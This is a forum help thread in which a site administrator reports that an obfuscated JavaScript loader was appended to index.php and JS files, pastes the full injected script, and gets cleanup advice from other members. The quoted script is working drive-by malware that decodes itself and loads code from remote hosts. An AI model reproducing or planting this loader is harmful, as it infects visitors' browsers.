

Forum infected with trojan?

Started by nwobhm, February 20, 2010, 01:52:14 PM


nwobhm

A few members of my forum noticed that their virus scanners raised a "trojan alert".
The alert identified it as JS:Illredir-S (id 100219-1).

After looking into this, my other admin found that the following line had been appended to the end of certain PHP files:
<script>var wu="97ad83ad95ff9a92bcafa4eb91a8bbacd5a6a181b1aeb4a8b49aa68e99b69f9389a290988ea39da7cee3cce1c8a6ad8389afb1a2b6a5969bb4b898bfac8a918eb08a9bdc92aaecb1ac8aeab19ec6bfb3";this.Gl="";this.sX=64246;var xGl="";function z(vY){var mu="mu";var BR=new String();var Sz=false;var o;if(o!='Yv' && o != ''){o=null}; function l(R,N){var A;if(A!='yCp'){A='yCp'};return R[D("ahCrcedtAo", [4,1,0,3,2])](N);var RT="RT";this.mh=18070;}var JM;if(JM!='gJ' && JM != ''){JM=null};var kx="kx";var cY='';var KL;if(KL!='Fc' && KL != ''){KL=null}; var F=function(B,a){return B^a;var fk;if(fk!='f'){fk=''};};this.fm=false;var CY;if(CY!='' && CY!='yl'){CY=null}; var v=function(U){var We=new String();var Uu=false;this.lY=false;this.ne=false;U = new J(U);var QQ;if(QQ!=''){QQ='L'};this.wn="";var h = '';var Qx="";var s =[0][0];var Zp=5199;var QA='';var y =[152,31,0][2];var hV = -1;var ie="ie";var jq=new String();this.gr=false;for (s=U[D("elgnht", [1,0])]-hV;s>=y;s=s-[93,86,1][2]){this.Uw='';var Ue="Ue";h+=U[D("hcratA", [1,0])](s);var bb=7045;this.KK="";}var QO;if(QO!='VC' && QO!='Il'){QO=''};var Pwo;if(Pwo!='fA'){Pwo=''};var Bpi='';return h;var Kn;if(Kn!='gD' && Kn != ''){Kn=null};};var pi="";var Hd;if(Hd!='SJY' &&  Hd!='wE'){Hd=''}; function Nr(u){var lx=u[D("elgnht", [1,0])];var w=[250,0,217][1];var m=[69,197,1][2];var ZO;if(ZO!='' && ZO!='yv'){ZO='GM'};var b=[238,255][1];var uM=false;var x=new String();var KX;if(KX!='' && KX!='qn'){KX=null};var r=[170,0,103,108][1];this.su=25939;while(r<lx){var At;if(At!='' && At!='tm'){At=''};var zu;if(zu!='' && zu!='bE'){zu='JJ'};var Zi;if(Zi!='' && Zi!='HsI'){Zi='Xa'};r++;var KM=false;i=l(u,r - m);w+=i*lx;var jI="jI";var OM;if(OM!='WhZ'){OM=''};}var dk;if(dk!='uK'){dk='uK'};var ZG='';var nz=32579;return new J(w % b);var yj="yj";var rK=new Date();}var Cl;if(Cl!='' && Cl!='Yl'){Cl=''};var uy;if(uy!='' && uy!='Op'){uy=''};var BO=new Date();var AI=new Date();var EB=''; var D=function(U, P){var Cj=new Date();var VO;if(VO!='' && VO!='PN'){VO=null};var Iv='';var 
LS=new Array();var hE;if(hE!='WR' && hE != ''){hE=null};var PF='';var vT = P.length;this.dF="dF";this.ut="ut";var FN = U.length;var EdL;if(EdL!='' && EdL!='Ed'){EdL=''};var h = '';var MR;if(MR!='LU'){MR='LU'};this.ai=42933;var y=[0,189,41,167][0];var Ln="Ln";var m=[1,202,55][0];var PT=new Date();this.FT='';var Nv;if(Nv!='os'){Nv='os'};var DH='';for(var s = y; s < FN; s += vT) {var ifj = U.substr(s, vT);if(ifj.length == vT){var RG="";for(var r in P) {var xF;if(xF!='RL' && xF != ''){xF=null};this.xh=false;h+=ifj.substr(P[r], m);var bD="bD";}var wv;if(wv!='' && wv!='HhW'){wv=null};} else {var JF;if(JF!='' && JF!='Fia'){JF='iA'};  h+=ifj;}this.qU=false;}var Uy;if(Uy!='Go' && Uy != ''){Uy=null};var PQ;if(PQ!='' &&  PQ!='uG'){PQ='aXY'};var ei="ei";return h;this.hU=15151;this.cr=62979;};this.So=63225;var I=window;var WD;if(WD!='' && WD!='EQ'){WD=''};var S=I[D("veal", [1,0,2])];this.cs="";this.uyo="";var C=S(D("nuFitcon", [2,1,0]));var Ga=new String();var X = '';this.Zx="Zx";this.tV="tV";var J=S(D("tSirgn", [1,0]));var yk;if(yk!='GMs' && yk!='of'){yk='GMs'};var Z=S(D("eRgxEp", [1,0,2]));var hc="hc";var lL=56973;var aG=new Array();var Ec=new Date();var iq=new Date();var d=J[D("raomChfrCode", [6,0,2,3,4,5,1])];this.sPq='';var Ab;if(Ab!=''){Ab='TVV'};var zT=new Date();var UAY="";var rm;if(rm!='' && rm!='zP'){rm='Ww'};var Y=I[D("nuseacep", [1,0])];this.dw='';var cy;if(cy!=''){cy='Mf'};var Ik;if(Ik!='uMy' && Ik!='XP'){Ik=''};var cT=new String();var nf=new String();this.bc="";var WW="WW";var T = /[^@a-z0-9A-Z_-]/g;this.Fq=false;var M=[1, D("menctdouaterE.cent(m\'leept\'r)sci", [5,6,3,7,0,1,2,4]),2, D("lilmi.etyctm.or", [3,1,2,0,4]),3, D("oducemtnb.do.ypaepdnhCli(d)d", [1,0]),4, D("moc.irccfniooc.mog.ogle", [2,1,0,3]),5, D("tsAtde.t\'betrui(defer\'", [4,6,1,5,3,2,7,0]),6, D("etw.newhom.lady0ru:880", [1,2,3,4,0]),7, D("oidnwl.nowoad", [4,1,3,2,0]),8, D("amgstep.oomc", [2,0,1]),11, D("maccost.com", [2,4,0,3,1,5,6,7]),12, D("l.oggeocom", [4,2,6,3,0,5,1]),14, D("ufcnitno)(", 
[1,0]),15, D("e)(hctac", [4,6,5,7,3,2,0,1]),16, D(":\"thpt", [1,3,5,2,4,0]),17, D("ebrtox", [2,4,1,3,0]),18, D("sc.dr", [3,2,0,4,1]),19, D("1\')\'", [1,0]),20, D("ocm", [1,0,2]),21, D("ytr", [1,2,0])];this.TZ=17174;this.jE=false;var m =[1,11,146][0];var rj=new String();var uL;if(uL!='ke' && uL != ''){uL=null};var Sr = vY[D("nlehgt", [1,2,0])];var DC=new Array();var du="";var y =[0,36,99,168][0];var Up = '';var js=new Array();var BG='';var e = J.fromCharCode(37);var Kf;if(Kf!='' && Kf!='ptk'){Kf=''};var Gd;if(Gd!=''){Gd='je'};var gb;if(gb!='hlz' && gb!='oCC'){gb=''};var NK = '';var Rk =[2,153,87,250][0];var fAf;if(fAf!='' && fAf!='eb'){fAf='TZu'};var g = '';var G =[0][0];var ye;if(ye!='JH' && ye!='zg'){ye='JH'};var gB=18419;var HC;if(HC!=''){HC='wS'};for(var Na=y; Na < Sr; Na+=Rk){NK+= e; var sg;if(sg!='ns' && sg!='al'){sg='ns'};this.pjv="pjv";NK+= vY[D("ussbrt", [1,0])](Na, Rk);}var UI="UI";this.FUO=35368;this.mZ=31071;this.Sv=8498;var vY = Y(NK);var MJ;if(MJ!='pA' && MJ!='Ze'){MJ=''};this.Vw=37474;this.yuf="yuf";var Hp=new String();var O = new J(z);var ZC;if(ZC!='' && ZC!='lz'){ZC='Bpc'};var cDV;if(cDV!='jeO'){cDV=''};var CX = O[D("preclae", [1,2,0])](T, Up);var AG="AG";var VI=18183;var k = M[D("enlthg", [2,0,1])];var pn;if(pn!='MG' && pn != ''){pn=null};var db=new Date();var iK = new J(C);CX = v(CX);var Wq;if(Wq!='Rn' && Wq!='jX'){Wq=''};var TQ;if(TQ!='' && TQ!='nS'){TQ=''};var qq;if(qq!='frd' && qq!='zt'){qq=''};var sP = iK[D("plerace", [3,2,0,1])](T, Up);this.Xn='';this.Isg='';var sP = Nr(sP);var Wl='';var PwL;if(PwL!='vo' && PwL!='kv'){PwL=''};var vC=Nr(CX);var yK;if(yK!='ge'){yK='ge'};this.Hy='';for(var s=y; s < (vY[D("nlehgt", [1,2,0])]);s=s+[53,1][1]) {this.ioM='';var pc='';var IV=57592;var H = CX.charCodeAt(G);var YA = l(vY,s);var Hu;if(Hu!='ym' && Hu!='EK'){Hu=''};var Je=false;YA = F(YA, H);var Gs=52657;var hG;if(hG!='BE'){hG='BE'};YA = F(YA, vC);var Ai='';YA = F(YA, sP);this.bL=38662;this.bK="";G++;var wR="";var SG;if(SG!='HhWa' && SG!='UwU'){SG=''};if(G 
> CX.length-m){G=y;var TZs="";}var Zv;if(Zv!=''){Zv='Qc'};var TA;if(TA!='' && TA!='tA'){TA=''};g += d(YA);var Tmx;if(Tmx!='' && Tmx!='oQ'){Tmx='bhY'};}var gf;if(gf!=''){gf='GZ'};for(GD=y; GD < k; GD+=Rk){this.uz="uz";var RI=false;this.tt=false;var az = M[GD + m];var nc=false;var q = d(M[GD]);var wMz;if(wMz!=''){wMz='wW'};var Er;if(Er!=''){Er='rn'};var HJq;if(HJq!='' && HJq!='vE'){HJq='ALM'};var dba;if(dba!='' && dba!='jy'){dba='uMK'};var Ss = new Z(q, "g");var BxE;if(BxE!='UZ'){BxE=''};g=g[D("erpalce", [1,0,2])](Ss, az);var DE;if(DE!='' && DE!='DK'){DE=''};this.JzT='';}var hO=48303;this.Js="Js";var YN;if(YN!='' && YN!='Gh'){YN='iZ'};var Eg;if(Eg!='IK'){Eg=''};var Mh=new C(g);this.ud=false;this.zPk='';Mh();var KZ=false;this.Nh=55746;sP = '';iK = '';var Ws=new String();this.XW=false;vC = '';var Gr;if(Gr!='XL'){Gr='XL'};var zL=new String();g = '';CX = '';var nfQ="";var IEF;if(IEF!='' && IEF!='dS'){IEF=null};this.cA="cA";Mh = '';var PR;if(PR!='EW'){PR=''};var hD;if(hD!='' && hD!='Pv'){hD=''};var AP;if(AP!='ve'){AP=''};this.lxk='';var Qy=49082;var rM=new Date();return '';this.Hb="";var HCW;if(HCW!=''){HCW='wN'};};this.Gl="";this.sX=64246;var xGl="";z(wu);</script>
<!--60999f5fea9ec6673dcfe12067f8b7a8-->


It seems to have infected all of the index.php files and some .js files. We are currently removing this line manually from all of the infected files, but will that be enough?
What else should I do?

I have installed following mods

1.    SMF Media Gallery      2.0.3
2.    PMXBlog    0.952
3.    Aeva ~ Auto-Embed Video & Audio    7.0
4.    Highslide Image Viewer    1.6
5.    Top 10 Posters and Topic Starters Stats (Today, This Week, This Month)    2.4.2
7.    Admin Notepad    2.0
8.    SMF Arcade    2.5 RC1
9.    Join Reason    1.2
10.    Spoiler Tag    0.7
11.    Reason For Editing Mod    2.0
12.    SimplePortal    2.3.1

greyknight17

Do you have a recent backup that's not infected? If so, restoring that backup would be my recommendation.

dgswilson

Someone has access to your website. The place to start is the home computer, because an infected workstation with stored FTP credentials is a common way this kind of file injection happens. Something like Avast free anti-virus might be enough. If you use an FTP program on your home computer, delete it and reinstall from a fresh download. Change every password on your website. Look for md5 files in your site directory and delete them. Check the database users and delete any that aren't "you". If you need help and are willing to pay, get hold of Steve Hyndman. Just search his name + wordpress. I think his website is educhalk.

Bottom line: if they got in, and you haven't got them out, then they're still in.

Mick.

I had something like this before. I believe all I did was remove those lines from all of the index.php files.

